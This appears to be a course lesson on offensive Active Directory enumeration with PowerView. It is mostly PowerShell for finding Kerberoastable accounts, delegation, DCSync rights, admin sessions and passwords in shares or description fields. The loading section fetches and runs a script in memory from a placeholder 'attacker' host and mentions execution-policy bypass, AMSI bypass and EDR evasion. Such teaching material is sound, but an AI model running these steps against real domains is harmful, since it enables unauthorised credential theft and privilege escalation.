PowerView Enumeration

intermediate35 minWriteup

Advanced AD enumeration with PowerView

Learning Objectives

  • Use PowerView cmdlets
  • Find interesting ACLs
  • Enumerate trusts
  • Identify attack opportunities

PowerView is the Swiss Army knife of Active Directory enumeration. Written by @harmj0y as part of PowerSploit, it provides PowerShell cmdlets for everything from finding Domain Admins to discovering attack paths. If BloodHound is your map, PowerView is your magnifying glass.

Think of it as a translator between you and Active Directory. Instead of writing complex LDAP queries, you use simple commands like "Get-DomainUser" and PowerView handles the messy details.

PowerView Versions

PowerView has evolved through multiple versions. The most current is in PowerSploit's dev branch. Some functions have been renamed (Get-NetUser → Get-DomainUser). We'll cover the current naming.

Loading PowerView

powershell
1606070;"># Download and import
2IEX (New-Object Net.WebClient).DownloadString(606070;">#a5d6ff;">'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1')
3 
4606070;"># Or from local file
5Import-Module .\PowerView.ps1
6 
7606070;"># If execution policy blocks
8Set-ExecutionPolicy Bypass -Scope Process
9. .\PowerView.ps1
10 
11606070;"># Check if loaded
12Get-Command -Module PowerView
13Get-DomainUser -Identity Administrator  606070;"># Test
14 
15606070;"># In memory without touching disk (AMSI bypass may be needed)
16$data = (New-Object Net.WebClient).DownloadData(606070;">#a5d6ff;">'http://attacker/PowerView.ps1')
17$assembly = [System.Reflection.Assembly]::Load($data)
18606070;"># Or use Invoke-Expression with base64

Detection

PowerView is heavily signatured. Modern EDR will likely detect it. Consider obfuscation or alternative tools in red team scenarios.

Domain Enumeration

powershell
1606070;"># Basic domain information
2Get-Domain                      606070;"># Current domain
3Get-Domain -Domain other.local  606070;"># Specific domain
4 
5606070;"># Domain controllers
6Get-DomainController
7Get-DomainController -Domain corp.local
8 
9606070;"># Domain SID
10Get-DomainSID
11 
12606070;"># Domain policy (password policy, etc.)
13Get-DomainPolicy
14(Get-DomainPolicy).SystemAccess  606070;"># Password requirements
15 
16606070;"># Domain trusts
17Get-DomainTrust
18Get-DomainTrust -Domain corp.local
19 
20606070;"># Forest information
21Get-Forest
22Get-ForestDomain      606070;"># All domains in forest
23Get-ForestTrust       606070;"># Inter-forest trusts

User Enumeration

powershell
1606070;"># All domain users
2Get-DomainUser | Select-Object samaccountname
3 
4606070;"># Specific user details
5Get-DomainUser -Identity administrator
6Get-DomainUser -Identity john.doe -Properties *
7 
8606070;"># Find users with specific attributes
9Get-DomainUser -SPN                    606070;"># Kerberoastable!
10Get-DomainUser -PreauthNotRequired     606070;"># AS-REP Roastable!
11Get-DomainUser -AdminCount             606070;"># Protected users (high value)
12Get-DomainUser -TrustedToAuth          606070;"># Constrained delegation
13Get-DomainUser -AllowDelegation        606070;"># Unconstrained delegation
14 
15606070;"># Search descriptions (often contain passwords!)
16Get-DomainUser -LDAPFilter 606070;">#a5d6ff;">"(description=*)" | Select-Object name, description
17Get-DomainUser | Where-Object {$_.description -match 606070;">#a5d6ff;">"pass"}
18 
19606070;"># Users with specific rights
20Get-DomainUser -Properties samaccountname,serviceprincipalname |
21  Where-Object {$_.serviceprincipalname}
22 
23606070;"># Recently changed passwords
24$Date = (Get-Date).AddDays(-30)
25Get-DomainUser -Properties samaccountname, pwdlastset |
26  Where-Object {$_.pwdlastset -gt $Date}
27 
28606070;"># Logged on users (requires admin on target)
29Get-NetLoggedon -ComputerName workstation01

Description Field Gold

Always check the description field. Admins frequently put temporary passwords, hints, or sensitive info there. "temp pass: Summer2024!"

Group Enumeration

powershell
1606070;"># All groups
2Get-DomainGroup | Select-Object samaccountname
3 
4606070;"># Specific group
5Get-DomainGroup -Identity 606070;">#a5d6ff;">"Domain Admins"
6 
7606070;"># Group members
8Get-DomainGroupMember -Identity 606070;">#a5d6ff;">"Domain Admins"
9Get-DomainGroupMember -Identity 606070;">#a5d6ff;">"Domain Admins" -Recurse  # Nested!
10 
11606070;"># Find groups user belongs to
12Get-DomainGroup -UserName john.doe
13 
14606070;"># High-value groups
15$groups = @(606070;">#a5d6ff;">"Domain Admins", "Enterprise Admins", "Administrators",
16            606070;">#a5d6ff;">"Account Operators", "Backup Operators", "Server Operators",
17            606070;">#a5d6ff;">"DnsAdmins", "Schema Admins")
18foreach ($group in $groups) {
19    Write-Host 606070;">#a5d6ff;">"=== $group ===" -ForegroundColor Yellow
20    Get-DomainGroupMember -Identity $group -Recurse |
21      Select-Object MemberName, MemberObjectClass
22}
23 
24606070;"># Local group members on machines
25Get-NetLocalGroupMember -ComputerName DC01
26Get-NetLocalGroupMember -ComputerName DC01 -GroupName Administrators
27 
28606070;"># Find machines where user is admin
29Find-LocalAdminAccess                          606070;"># Current user
30Find-DomainUserLocation -UserIdentity john.doe 606070;"># Specific user

Computer Enumeration

powershell
1606070;"># All computers
2Get-DomainComputer | Select-Object dnshostname, operatingsystem
3 
4606070;"># Filter by OS
5Get-DomainComputer -OperatingSystem 606070;">#a5d6ff;">"*Server*"
6Get-DomainComputer -OperatingSystem 606070;">#a5d6ff;">"*Server 2019*"
7Get-DomainComputer -OperatingSystem 606070;">#a5d6ff;">"*Windows 10*"
8 
9606070;"># Computers with unconstrained delegation (high value!)
10Get-DomainComputer -Unconstrained
11Get-DomainComputer -TrustedToAuth  606070;"># Constrained delegation
12 
13606070;"># Live machines (ping sweep)
14Get-DomainComputer -Ping
15 
16606070;"># Find machines with specific service
17Get-DomainComputer -LDAPFilter 606070;">#a5d6ff;">"(servicePrincipalName=*MSSQL*)"
18 
19606070;"># Computer details
20Get-DomainComputer -Identity DC01 -Properties *

Share Enumeration

powershell
1606070;"># Find shares on specific machine
2Get-NetShare -ComputerName dc.corp.local
3 
4606070;"># Find shares across domain
5Find-DomainShare                      606070;"># All shares
6Find-DomainShare -CheckShareAccess    606070;"># Only accessible shares
7 
8606070;"># Find interesting files in shares
9Find-InterestingDomainShareFile
10Find-InterestingDomainShareFile -Include @(606070;">#a5d6ff;">"*.ps1", "*.config", "*.xml")
11 
12606070;"># Specific file types
13Find-InterestingDomainShareFile -Include 606070;">#a5d6ff;">"*password*"
14Find-InterestingDomainShareFile -Include 606070;">#a5d6ff;">"*.kdbx"      # KeePass
15Find-InterestingDomainShareFile -Include 606070;">#a5d6ff;">"web.config"  # Connection strings

GPO Enumeration

powershell
1606070;"># All GPOs
2Get-DomainGPO | Select-Object displayname, gpcfilesyspath
3 
4606070;"># GPO applied to specific computer
5Get-DomainGPO -ComputerIdentity workstation01
6 
7606070;"># GPO applied to specific user
8Get-DomainGPO -UserIdentity john.doe
9 
10606070;"># Find GPOs with specific settings
11Get-DomainGPO | Where-Object {$_.gpcfilesyspath -match 606070;">#a5d6ff;">"scripts"}
12 
13606070;"># GPO permissions (who can edit?)
14Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs |
15  Where-Object {$_.ActiveDirectoryRights -match 606070;">#a5d6ff;">"Write"}
16 
17606070;"># OUs and their GPOs
18Get-DomainOU | Select-Object name, gplink

GPO Attack Paths

If you can edit a GPO, you can push malicious scripts/settings to all computers/users it applies to. Always check GPO permissions!

ACL Enumeration

powershell
1606070;"># ACLs on specific object
2Get-DomainObjectAcl -Identity 606070;">#a5d6ff;">"Domain Admins" -ResolveGUIDs
3 
4606070;"># Find interesting ACLs for current user
5Find-InterestingDomainAcl -ResolveGUIDs
6 
7606070;"># ACLs where specific user has rights
8Get-DomainObjectAcl -ResolveGUIDs |
9  Where-Object {$_.SecurityIdentifier -match 606070;">#a5d6ff;">"S-1-5-21-...-1001"}
10 
11606070;"># Look for GenericAll, WriteDACL, WriteOwner, etc.
12Get-DomainObjectAcl -Identity john.doe -ResolveGUIDs |
13  Where-Object {$_.ActiveDirectoryRights -match 606070;">#a5d6ff;">"GenericAll|WriteDacl|WriteOwner"}
14 
15606070;"># Find objects user can modify
16$sid = Get-DomainUser -Identity currentuser | Select-Object -ExpandProperty objectsid
17Get-DomainObjectAcl -ResolveGUIDs |
18  Where-Object {$_.SecurityIdentifier -eq $sid}

Session Enumeration

powershell
1606070;"># Where is a user logged in?
2Find-DomainUserLocation -UserIdentity administrator
3 
4606070;"># Who's logged into a machine?
5Get-NetLoggedon -ComputerName workstation01
6 
7606070;"># Active sessions
8Get-NetSession -ComputerName dc01
9 
10606070;"># Find where Domain Admins are logged in (jackpot!)
11Find-DomainUserLocation -UserGroupIdentity 606070;">#a5d6ff;">"Domain Admins"
12 
13606070;"># Hunt specific user
14Find-DomainUserLocation -UserIdentity targetuser -CheckAccess

Session Hunting

Finding where admins are logged in reveals targets for credential theft. If DA is logged into workstation01 and you can get admin there, you can steal their credentials.

Finding Attack Paths

powershell
1606070;"># Kerberoastable users (especially privileged)
2Get-DomainUser -SPN -AdminCount |
3  Select-Object samaccountname, serviceprincipalname, memberof
4 
5606070;"># AS-REP Roastable users
6Get-DomainUser -PreauthNotRequired
7 
8606070;"># Unconstrained delegation (TGT theft)
9Get-DomainComputer -Unconstrained
10Get-DomainUser -TrustedToAuth
11 
12606070;"># Constrained delegation (service impersonation)
13Get-DomainComputer -TrustedToAuth |
14  Select-Object samaccountname, msds-allowedtodelegateto
15Get-DomainUser -TrustedToAuth |
16  Select-Object samaccountname, msds-allowedtodelegateto
17 
18606070;"># Users with DCSync rights
19Get-DomainObjectAcl -SearchBase 606070;">#a5d6ff;">"DC=corp,DC=local" -SearchScope Base -ResolveGUIDs |
20  Where-Object {($_.ActiveDirectoryRights -match 606070;">#a5d6ff;">'GenericAll') -or
21                ($_.ObjectAceType -match 606070;">#a5d6ff;">'Replication')}
22 
23606070;"># Exchange Windows Permissions (often has DCSync)
24Get-DomainGroupMember -Identity 606070;">#a5d6ff;">"Exchange Windows Permissions"

PowerView Cheatsheet

1Essential Commands:
2├── Domain Info
3│   ├── Get-Domain
4│   ├── Get-DomainController
5│   └── Get-DomainTrust
6├── Users
7│   ├── Get-DomainUser
8│   ├── Get-DomainUser -SPN (Kerberoast targets)
9│   └── Get-DomainUser -PreauthNotRequired (AS-REP targets)
10├── Groups
11│   ├── Get-DomainGroup
12│   ├── Get-DomainGroupMember -Recurse
13│   └── Find-LocalAdminAccess
14├── Computers
15│   ├── Get-DomainComputer
16│   ├── Get-DomainComputer -Unconstrained
17│   └── Get-NetLoggedon
18├── Shares
19│   ├── Find-DomainShare
20│   └── Find-InterestingDomainShareFile
21├── ACLs
22│   ├── Get-DomainObjectAcl
23│   └── Find-InterestingDomainAcl
24└── Sessions
25    ├── Find-DomainUserLocation
26    └── Get-NetSession

PowerView Methodology

Systematic Enumeration

1
Domain InfoGet-Domain, Get-DomainTrust, Get-DomainController
2
High-Value UsersDomain Admins, AdminCount users, SPNs
3
Attack TargetsKerberoastable, AS-REP roastable, delegations
4
Session HuntingFind where admins are logged in
5
ACL AbuseFind writable objects for privilege escalation
6
SharesSearch for credentials in accessible shares

Knowledge Check

Quick Quiz
Question 1 of 3

Which PowerView command finds Kerberoastable accounts?

Challenges

Complete Domain Recon

Challenge
🔥 intermediate

Using PowerView, create a comprehensive enumeration report including: all Domain Admins, Kerberoastable accounts with admin privileges, and machines with unconstrained delegation.

Need a hint? (4 available)

Key Takeaways

  • PowerView simplifies AD enumeration with PowerShell cmdlets
  • Get-DomainUser -SPN finds Kerberoastable accounts
  • Get-DomainUser -PreauthNotRequired finds AS-REP roastable accounts
  • Find-DomainUserLocation reveals where admins are logged in
  • Always check description fields for credentials
  • Find-InterestingDomainAcl discovers privilege escalation paths